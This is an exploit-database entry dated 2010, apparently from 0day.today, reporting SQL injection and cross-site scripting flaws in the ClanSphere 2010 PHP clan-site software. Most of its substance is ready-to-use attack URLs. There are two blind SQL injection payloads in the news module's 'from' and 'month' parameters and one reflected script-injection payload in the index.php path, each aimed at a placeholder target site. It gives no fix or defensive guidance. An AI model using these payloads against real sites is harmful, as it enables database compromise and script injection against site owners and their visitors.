ClanSphere 2010 Multiple Vulnerabilities

2010-08-25T00:00:00
ID 1337DAY-ID-13819
Type zdt
Reporter Sweet
Modified 2010-08-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================
ClanSphere 2010 Multiple Vulnerabilities
========================================

############################################################################
#                                                                          #
# Exploit Title: Clansphere Multiple vulnerabilities                       #
#                                                                          #
# Date: 24/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact : charif38@hotmail.fr                                            #
#                                                                          #
# Software Link:                                                           #
#                                                                          # 
# Download:http: http://sourceforge.net/projects/clansphere/               #
#                                                                          # 
# Version: all                                                             #
#                                                                          #
# Tested on: WinXp sp3                                                     #
#                                                                          #
# Risk : HIGHT                                                             #
#                                                                          #
#                                                                          #
# Description :  clansphere offers some nice features for                  # 
#                                                                          #
# you to easily set up and maintain your proper clan site within minutes!  #
#                                                                          #
############################################################################

1- Blind Sql injection :

http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+

http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+

2-Xss :

http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>


Saha Ftourkoum et 1,2,3 viva L'Algerie :))



#  0day.today [2016-04-20]  #